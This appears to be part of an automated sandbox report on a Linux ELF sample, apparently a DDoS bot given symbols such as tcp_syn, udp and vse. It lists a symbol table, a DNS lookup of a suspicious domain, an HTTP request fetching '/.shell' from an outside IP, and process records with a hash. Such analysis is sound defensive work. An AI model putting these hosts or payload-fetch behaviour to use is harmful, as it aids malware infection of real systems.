              sprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              srand.symtab0x1fde076FUNC<unknown>DEFAULT2
              srandom.symtab0x1fde076FUNC<unknown>DEFAULT2
              srandom_r.symtab0x1ffec228FUNC<unknown>DEFAULT2
              static_id.symtab0x383f02OBJECT<unknown>DEFAULT9
              static_ns.symtab0x3a7044OBJECT<unknown>DEFAULT10
              stderr.symtab0x380d04OBJECT<unknown>DEFAULT9
              stdin.symtab0x380c84OBJECT<unknown>DEFAULT9
              stdout.symtab0x380cc4OBJECT<unknown>DEFAULT9
              str_to_lower.symtab0x11ec4108FUNC<unknown>DEFAULT2
              strcasecmp.symtab0x243b092FUNC<unknown>DEFAULT2
              strcasecmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strcat.symtab0x1d8d0896FUNC<unknown>DEFAULT2
              strchr.symtab0x1dcc4524FUNC<unknown>DEFAULT2
              strcmp.symtab0x23808648FUNC<unknown>DEFAULT2
              strcoll.symtab0x23808648FUNC<unknown>DEFAULT2
              strcpy.symtab0x1dff8804FUNC<unknown>DEFAULT2
              strdup.symtab0x23cac56FUNC<unknown>DEFAULT2
              strdup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strerror_r.symtab0x1e730284FUNC<unknown>DEFAULT2
              strlen.symtab0x1e384120FUNC<unknown>DEFAULT2
              strncat.symtab0x23b5c224FUNC<unknown>DEFAULT2
              strncat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strncpy.symtab0x1e3fc248FUNC<unknown>DEFAULT2
              strncpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strnlen.symtab0x1e4f4252FUNC<unknown>DEFAULT2
              strnlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strpbrk.symtab0x226c080FUNC<unknown>DEFAULT2
              strpbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strrchr.symtab0x1ded0192FUNC<unknown>DEFAULT2
              strspn.symtab0x23c3c112FUNC<unknown>DEFAULT2
              strspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strstr.symtab0x1e5f0288FUNC<unknown>DEFAULT2
              strstr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strtok.symtab0x1e84c24FUNC<unknown>DEFAULT2
              strtok.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strtok_r.symtab0x22644124FUNC<unknown>DEFAULT2
              strtok_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              strtol.symtab0x201cc20FUNC<unknown>DEFAULT2
              strtol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              table.symtab0x3a710312OBJECT<unknown>DEFAULT10
              table_init.symtab0x10554400FUNC<unknown>DEFAULT2
              tcgetattr.symtab0x1e884112FUNC<unknown>DEFAULT2
              tcgetattr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              tcp_ack.symtab0x169e42860FUNC<unknown>DEFAULT2
              tcp_ackpsh.symtab0x175102856FUNC<unknown>DEFAULT2
              tcp_syn.symtab0x15eb82860FUNC<unknown>DEFAULT2
              time.symtab0x19acc72FUNC<unknown>DEFAULT2
              time.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              timeout.symtab0x380a84OBJECT<unknown>DEFAULT9
              tolower.symtab0x19bb436FUNC<unknown>DEFAULT2
              tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              translatemethis.symtab0x1090c496FUNC<unknown>DEFAULT2
              type_codes.symtab0x26a6024OBJECT<unknown>DEFAULT4
              type_sizes.symtab0x26a7812OBJECT<unknown>DEFAULT4
              udp.symtab0x136981140FUNC<unknown>DEFAULT2
              umask.symtab0x19b1484FUNC<unknown>DEFAULT2
              umask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              unknown.1115.symtab0x26b0814OBJECT<unknown>DEFAULT4
              unlockthis.symtab0x106e492FUNC<unknown>DEFAULT2
              unsafe_state.symtab0x3833028OBJECT<unknown>DEFAULT9
              usleep.symtab0x2065072FUNC<unknown>DEFAULT2
              usleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              vfork.symtab0x20a4452FUNC<unknown>DEFAULT2
              vfprintf.symtab0x1a864148FUNC<unknown>DEFAULT2
              vfprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              vse.symtab0x13b0c768FUNC<unknown>DEFAULT2
              vsnprintf.symtab0x1a080156FUNC<unknown>DEFAULT2
              vsnprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              wait4.symtab0x2348880FUNC<unknown>DEFAULT2
              wait4.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              waitpid.symtab0x2122020FUNC<unknown>DEFAULT2
              waitpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              wcrtomb.symtab0x2136872FUNC<unknown>DEFAULT2
              wcrtomb.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              wcsnrtombs.symtab0x213cc188FUNC<unknown>DEFAULT2
              wcsnrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              wcsrtombs.symtab0x213b028FUNC<unknown>DEFAULT2
              wcsrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              write.symtab0x19b6876FUNC<unknown>DEFAULT2
              write.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              xdigits.3071.symtab0x276a817OBJECT<unknown>DEFAULT4
              xstatconv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS

              Download Network PCAP: filteredfull

              • Total Packets: 9
              • 443 (HTTPS)
              • 80 (HTTP)
              • 53 (DNS)
              TimestampSource PortDest PortSource IPDest IP
              Nov 3, 2024 13:51:16.409014940 CET46698443192.168.2.14216.126.231.240
              Nov 3, 2024 13:51:16.409079075 CET44346698216.126.231.240192.168.2.14
              Nov 3, 2024 13:51:16.409152985 CET46698443192.168.2.14216.126.231.240
              Nov 3, 2024 13:51:16.414175987 CET3473280192.168.2.14216.126.231.240
              Nov 3, 2024 13:51:16.419292927 CET8034732216.126.231.240192.168.2.14
              Nov 3, 2024 13:51:16.419353008 CET3473280192.168.2.14216.126.231.240
              Nov 3, 2024 13:51:16.421919107 CET3473280192.168.2.14216.126.231.240
              Nov 3, 2024 13:51:16.426870108 CET8034732216.126.231.240192.168.2.14
              Nov 3, 2024 13:51:17.690979958 CET8034732216.126.231.240192.168.2.14
              Nov 3, 2024 13:51:17.691358089 CET3473280192.168.2.14216.126.231.240
              Nov 3, 2024 13:51:17.696185112 CET8034732216.126.231.240192.168.2.14
              Nov 3, 2024 13:52:18.756278992 CET46698443192.168.2.14216.126.231.240
              Nov 3, 2024 13:52:18.756361008 CET44346698216.126.231.240192.168.2.14
              Nov 3, 2024 13:52:18.756433964 CET46698443192.168.2.14216.126.231.240
              TimestampSource PortDest PortSource IPDest IP
              Nov 3, 2024 13:51:16.359441996 CET5362453192.168.2.141.1.1.1
              Nov 3, 2024 13:51:16.405651093 CET53536241.1.1.1192.168.2.14
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Nov 3, 2024 13:51:16.359441996 CET192.168.2.141.1.1.10x3e51Standard query (0)conn.masjesu.zipA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Nov 3, 2024 13:51:16.405651093 CET1.1.1.1192.168.2.140x3e51No error (0)conn.masjesu.zip87.120.84.230A (IP address)IN (0x0001)false
              Nov 3, 2024 13:51:16.405651093 CET1.1.1.1192.168.2.140x3e51No error (0)conn.masjesu.zip216.126.231.240A (IP address)IN (0x0001)false
              • 216.126.231.240
              Session IDSource IPSource PortDestination IPDestination Port
              0192.168.2.1434732216.126.231.24080
              TimestampBytes transferredDirectionData
              Nov 3, 2024 13:51:16.421919107 CET78OUTGET /.shell HTTP/1.1
              Host: 216.126.231.240
              Connection: close


              System Behavior

              Start time (UTC):12:51:15
              Start date (UTC):03/11/2024
              Path:/tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf
              Arguments:/tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf
              File size:4379400 bytes
              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

              Start time (UTC):12:51:15
              Start date (UTC):03/11/2024
              Path:/tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf
              Arguments:-
              File size:4379400 bytes
              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

              Start time (UTC):12:51:15
              Start date (UTC):03/11/2024
              Path:/tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf
              Arguments:-
              File size:4379400 bytes
              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

              Start time (UTC):12:51:15
              Start date (UTC):03/11/2024
              Path:/tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf
              Arguments:-
              File size:4379400 bytes
              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

              Start time (UTC):12:51:15
              Start date (UTC):03/11/2024
              Path:/tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf
              Arguments:-
              File size:4379400 bytes
              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e